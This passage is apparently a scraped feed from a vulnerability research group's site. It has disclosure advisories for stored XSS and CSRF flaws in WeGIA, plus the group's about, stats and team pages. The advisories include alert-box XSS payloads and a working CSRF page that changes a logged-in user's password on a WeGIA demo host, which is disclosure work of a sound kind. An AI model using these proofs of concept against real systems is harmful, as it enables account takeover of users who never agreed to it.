rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p><h2 id="cve-2024-53470-stored-xss-in-gateway_pagamentophp-function">CVE-2024-53470: Stored XSS in <code>gateway_pagamento.php</code> function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53470" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53470</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <h2 id="poc">POC </h2><p>File: <code>gateway_pagamento.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p>Endpoint: <code>id="plataforma-endpoint"</code>, <code>name="endpoint"</code></p> <p><img src="https://github.com/user-attachments/assets/e671acdc-1ccf-49c5-9334-b105ddc4d97d" loading="lazy" alt="image" /></p> <p>File: <code>gateway_pagamento.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS2'</span><span class="p">);</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p>Endpoint: <code>id="plataforma-nome"</code>, <code>name="nome"</code></p> <p><img src="https://github.com/user-attachments/assets/a6d07283-288b-4db5-9258-d43361810f40" loading="lazy" alt="image" /></p> <p>File: <code>gateway_pagamento.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS3'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p>Endpoint: <code>id="plataforma-chave"</code>, <code>name="token"</code></p> <p><img src="https://github.com/user-attachments/assets/99287dce-2b9d-42e0-a2e8-6164cda24619" loading="lazy" alt="image" /></p> <h2 id="reference">Reference </h2><p><a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53470" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53470</a></p> <h2 id="solution">Solution </h2><p><a class="link" href="https://github.com/nilsonLazarin/WeGIA/issues/789" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/789</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Cardoso Borda Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 05 Dec 2024 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-53471/ https://www.cvehunters.com/p/cve-2024-53471/ <h2 id="cve-2024-53471-stored-xss-in-meio_pagamentophp-function">CVE-2024-53471: Stored XSS in <code>meio_pagamento.php</code> function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53471" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53471</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p><h2 id="cve-2024-53471-stored-xss-in-meio_pagamentophp-function">CVE-2024-53471: Stored XSS in <code>meio_pagamento.php</code> function </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53471" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53471</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user's browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.</p> <h2 id="poc">POC </h2><p>File: <code>meio_pagamento.php</code></p> <p>Payload:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'Alert: XSS4'</span><span class="p">);</span><span class="o"><</span><span class="err">/script></span> </span></span></code></pre></td></tr></table> </div> </div><p>Endpoint: <code>id="meio-pagamento-nome"</code>, <code>name="nome"</code></p> <p><img src="https://github.com/user-attachments/assets/d6dedcf1-92f1-4b2c-8ea0-27ce1408c23b" loading="lazy" alt="image" /></p> <h2 id="reference">Reference </h2><p><a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53471" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53471</a></p> <h2 id="solution">Solution </h2><p><a class="link" href="https://github.com/nilsonLazarin/WeGIA/issues/789" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/789</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Cardoso Borda Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 05 Dec 2024 00:00:00 +0000 https://www.cvehunters.com/p/cve-2024-53472/ https://www.cvehunters.com/p/cve-2024-53472/ <h2 id="cve-2024-53472-csrf-in-controlphp-to-change-password">CVE-2024-53472: CSRF in <code>control.php</code> to change password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53472" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53472</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.</p><h2 id="cve-2024-53472-csrf-in-controlphp-to-change-password">CVE-2024-53472: CSRF in <code>control.php</code> to change password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53472" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53472</a></em></p> </blockquote> <h2 id="vendor">Vendor </h2><p style="text-align: justify;"> WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. </p> <p><a class="link" href="https://www.wegia.org/" target="_blank" rel="noopener" >https://www.wegia.org</a></p> <p><a class="link" href="https://sol.sbc.org.br/index.php/latinoware/article/view/31544" target="_blank" rel="noopener" >https://sol.sbc.org.br/index.php/latinoware/article/view/31544</a></p> <h2 id="affected-product-code-base">Affected Product Code Base </h2><p>WeGIA < v3.2.0</p> <h2 id="vulnerability-description">Vulnerability Description </h2><p style="text-align: justify;">A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.</p> <h2 id="poc">POC </h2><p style="text-align: justify;">This code allows an attacker to change the password of an authenticated user without their consent by loading this malicious page while the user is logged into the application.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"><span class="cp"><!DOCTYPE html></span> </span></span><span class="line"><span class="cl"><span class="p"><</span><span class="nt">html</span> <span class="na">lang</span><span class="o">=</span><span class="s">"en"</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"><</span><span class="nt">head</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">meta</span> <span class="na">charset</span><span class="o">=</span><span class="s">"UTF-8"</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">title</span><span class="p">></span>CSRF Exploit<span class="p"></</span><span class="nt">title</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">head</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"><</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="p"><</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"> <span class="nx">fetch</span><span class="p">(</span><span class="s2">"https://demo.wegia.org/controle/control.php"</span><span class="p">,</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">method</span><span class="o">:</span> <span class="s2">"POST"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="nx">headers</span><span class="o">:</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">"Content-Type"</span><span class="o">:</span> <span class="s2">"application/x-www-form-urlencoded"</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">},</span> </span></span><span class="line"><span class="cl"> <span class="nx">body</span><span class="o">:</span> <span class="s2">"senha_antiga=wegia&nova_senha=1234567&confirmar_senha=1234567&nomeClasse=FuncionarioControle&metodo=alterarSenha&redir=logout.php&id_pessoa=1&alterar=Alterar"</span> </span></span><span class="line"><span class="cl"> <span class="p">})</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">response</span> <span class="p">=></span> <span class="nx">response</span><span class="p">.</span><span class="nx">text</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="nx">then</span><span class="p">(</span><span class="nx">data</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">data</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="p">.</span><span class="k">catch</span><span class="p">(</span><span class="nx">error</span> <span class="p">=></span> <span class="nx">console</span><span class="p">.</span><span class="nx">error</span><span class="p">(</span><span class="s1">'Error:'</span><span class="p">,</span> <span class="nx">error</span><span class="p">));</span> </span></span><span class="line"><span class="cl"> <span class="p"></</span><span class="nt">script</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">body</span><span class="p">></span> </span></span><span class="line"><span class="cl"><span class="p"></</span><span class="nt">html</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="reference">Reference </h2><p><a class="link" href="https://www.cve.org/CVERecord?id=CVE-2024-53472" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2024-53472</a></p> <h2 id="solution">Solution </h2><p><a class="link" href="https://github.com/nilsonLazarin/WeGIA/issues/790" target="_blank" rel="noopener" >https://github.com/nilsonLazarin/WeGIA/issues/790</a></p> <h2 id="discoverer">Discoverer </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Cardoso Borda Castro</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 05 Dec 2024 00:00:00 +0000 https://www.cvehunters.com/archives/ https://www.cvehunters.com/archives/ Sun, 06 Mar 2022 00:00:00 +0000 https://www.cvehunters.com/about/ https://www.cvehunters.com/about/ <div align="center" width=100% > <h1 id="cve-hunters">CVE Hunters </h1><blockquote> <p><em><strong>Vulnerability Research Group 🔎</strong></em></p> </blockquote> <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"> <p><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"><img src="https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab" /></a></p> </div> <h2 id=""> </h2><div align="justify"> <h3>Our Mission 🚀</h3> <p><img src="https://img.shields.io/badge/I-6407ab" /> Identify and document vulnerabilities in open-source projects widely used within the community, contributing to the continuous improvement of their information security posture; </p> <p><img src="https://img.shields.io/badge/II-6407ab" /> Promote the practical training of new professionals in the field of information security by providing students with realistic, hands-on experience in the processes of vulnerability identification, reporting, and remediation; </p><div align="center" width=100% > <h1 id="cve-hunters">CVE Hunters </h1><blockquote> <p><em><strong>Vulnerability Research Group 🔎</strong></em></p> </blockquote> <a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"> <p><a href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters"><img src="https://img.shields.io/badge/CVE_Hunters_ᯤ-6407ab" / /></a></p> </div> <h2 id=""> </h2><div align="justify"> <h3>Our Mission 🚀</h3> <p><img src="https://img.shields.io/badge/I-6407ab" / /> Identify and document vulnerabilities in open-source projects widely used within the community, contributing to the continuous improvement of their information security posture; </p> <p><img src="https://img.shields.io/badge/II-6407ab" / /> Promote the practical training of new professionals in the field of information security by providing students with realistic, hands-on experience in the processes of vulnerability identification, reporting, and remediation; </p> <p><img src="https://img.shields.io/badge/III-6407ab" / /> Foster collaboration in the field of information security by encouraging other researchers to contribute to the publication of CVEs, thereby increasing the visibility of the projects and mitigating cybersecurity risks. </p> </div> <h3 id="contributed-projects">Contributed Projects </h3><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/LabRedesCefetRJ/WeGIA"> <img src="/about/wegia.png" width="100"/ /> </br> <b>WeGIA</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/portabilis/i-educar"> <img src="/about/i-educar.png" width="100"/ /> </br> <b>i-Educar</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/portabilis/i-diario"> <img src="/about/i-diario.png" width="100"/ /> </br> <b>i-Diário</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://uxwing.com/wp-content/themes/uxwing/download/brands-and-social-media/ruby-programming-language-icon.png" width="20"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 92</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 81</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 14</b></td> </tr> </tbody> </table> <br/ /> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.sourcecodester.com/"> <img src="/about/sourcecodester.png" width="100"/ /> </br> <b>SourceCodester</b> </a> </td> <td style="text-align: center;"> <a href="https://www.mercusys.com.br/"> <img src="/about/mercusys.png" width="100"/ /> </br> <b>Mercusys</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/SCADA-LTS/Scada-LTS"> <img src="/about/scada-lts.png" width="100"/ /> </br> <b>SCADA-LTS</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/9694/9694712.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/226/226777.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 3</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 2</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 13</b></td> </tr> </tbody> </table> <br/ /> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/centreon/centreon"> <img src="/about/centreon.png" width="100"/ /> </br> <b>Centreon</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/getgrav/grav"> <img src="/about/grav.png" width="100"/ /> </br> <b>Grav</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/indico/indico"> <img src="/about/indico.png" width="100"/ /> </br> <b>Indico</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://cdn.iconscout.com/icon/free/png-256/free-python-logo-icon-download-in-svg-png-gif-file-formats--technology-social-media-vol-5-pack-logos-icons-3030224.png?f=webp" width="28"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 12</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 6</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/mautic/mautic"> <img src="/about/mautic.png" width="100"/ /> </br> <b>Mautic</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/novosga/novosga"> <img src="/about/NovoSGA.png" width="100"/ /> </br> <b>NovoSGA</b> </a> </td> <td style="text-align: center;"> <a href="https://github.com/librenms/librenms"> <img src="/about/LibreNMS.png" width="100"/ /> </br> <b>LibreNMS</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> <td style="text-align: center;"><img src="https://www.php.net/images/logos/new-php-logo.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 2</b></td> <td style="text-align: center;"><b>🛡️ CVEs: 3</b></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://github.com/projeto-siga/siga"> <img src="/about/siga.png" width="100"/ /> </br> <b>SIGA</b> </a> </td> </tr> <tr> <td style="text-align: center;"><img src="https://cdn-icons-png.flaticon.com/512/226/226777.png" width="35"/ /></td> </tr> <tr> <td style="text-align: center;"><b>🛡️ CVEs: 1</b></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/search/ https://www.cvehunters.com/search/ Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/stats/ https://www.cvehunters.com/stats/ <p>All statistics of CVEs registered by CVE-Hunters’s Team:</p> <h3 id="total-cves-registered">Total CVEs Registered </h3><img src="/stats/totalCVEsRegistred.png" width=100% height=100> <h3 id="top-finders">Top Finders </h3><img src="/stats/topFinderss.png" width=100% height=100> <h3 id="vulnerability-type">Vulnerability Type </h3><img src="/stats/vulnerabilityType.png" width=100% height=100> <h3 id="severity">Severity </h3><img src="/stats/severity.png" width=100% height=100> <h3 id="repository-stars-history">Repository Stars History </h3><img src="https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&type=Date" width=100% height=100><p>All statistics of CVEs registered by CVE-Hunters’s Team:</p> <h3 id="total-cves-registered">Total CVEs Registered </h3><img src="/stats/totalCVEsRegistred.png" width=100% height=100 /> <h3 id="top-finders">Top Finders </h3><img src="/stats/topFinderss.png" width=100% height=100 /> <h3 id="vulnerability-type">Vulnerability Type </h3><img src="/stats/vulnerabilityType.png" width=100% height=100 /> <h3 id="severity">Severity </h3><img src="/stats/severity.png" width=100% height=100 /> <h3 id="repository-stars-history">Repository Stars History </h3><img src="https://api.star-history.com/svg?repos=CVE-Hunters/cve-hunters&type=Date" width=100% height=100 /> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/support/ https://www.cvehunters.com/support/ <p>Learn more about our partners and sponsors below:</p> <h2 id="partners">Partners </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://azure.microsoft.com/pt-br/"> <img src="azure.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://caido.io/"> <img src="caido.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://hacktiba.github.io/"> <img src="hacktiba.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://azure.microsoft.com/pt-br/">Azure</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://caido.io/">caido</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://hacktiba.github.io/">Hacktiba</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://vuldb.com/"> <img src="vuldb.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://vuldb.com/">VulDB</a></td> </tr> </tbody> </table> <h2 id="sponsors">Sponsors </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://institutoumpassodecadavez.org/"> <img src="instituto-um-passo-de-cada-vez.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://future.com.br/"> <img src="future.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://institutoumpassodecadavez.org/">Instituto Um Passo</br>de Cada Vez</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://future.com.br/">future</a></td> </tr> </tbody> </table><p>Learn more about our partners and sponsors below:</p> <h2 id="partners">Partners </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://azure.microsoft.com/pt-br/"> <img src="azure.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://caido.io/"> <img src="caido.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://hacktiba.github.io/"> <img src="hacktiba.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://azure.microsoft.com/pt-br/">Azure</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://caido.io/">caido</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://hacktiba.github.io/">Hacktiba</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://vuldb.com/"> <img src="vuldb.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://vuldb.com/">VulDB</a></td> </tr> </tbody> </table> <h2 id="sponsors">Sponsors </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://institutoumpassodecadavez.org/"> <img src="instituto-um-passo-de-cada-vez.png" width="100"/ /> </a><br /> </td> <td style="text-align: center;"> <a href="https://future.com.br/"> <img src="future.png" width="100"/ /> </a><br /> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://institutoumpassodecadavez.org/">Instituto Um Passo</br>de Cada Vez</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://future.com.br/">future</a></td> </tr> </tbody> </table> Mon, 01 Jan 0001 00:00:00 +0000 https://www.cvehunters.com/team/ https://www.cvehunters.com/team/ <p>You can find useful repositories and contributors links below:</p> <h2 id="founder">Founder </h2><table border="1" style="max-width: 155px;"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/nmmorette/"> <img src="/assets/contributors/natan.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/nmmorette/">Natan Maia<br> Morette</a></td> </tr> </tbody> </table> <h2 id="contributors">Contributors </h2><table border="1" align="center"> <tbody> <tr> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/angelo-morette-019/"> <img src="/assets/contributors/angelo.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/diegocbcastro/"> <img src="/assets/contributors/diego.png" width="100"/> </a><br> </td> <td style="text-align: center;"> <a href="https://www.linkedin.com/in/elisangelasilvademendonca/"> <img src="/assets/contributors/elisangela.png" width="100"/> </a><br> </td> </tr> <tr> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/angelo-morette-019/">Angelo<br>Morette</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/diegocbcastro/">Diego<br>Castro</a></td> <td style="text-align: center; font-weight: bold;"><a href="https://www.linkedin.com/in/elisangelasilvademendonca/">Elisângela<br>Mendonça</a></td> </tr> </tbody> </table> <table border="1" align="center"> <tbody> <tr> <td 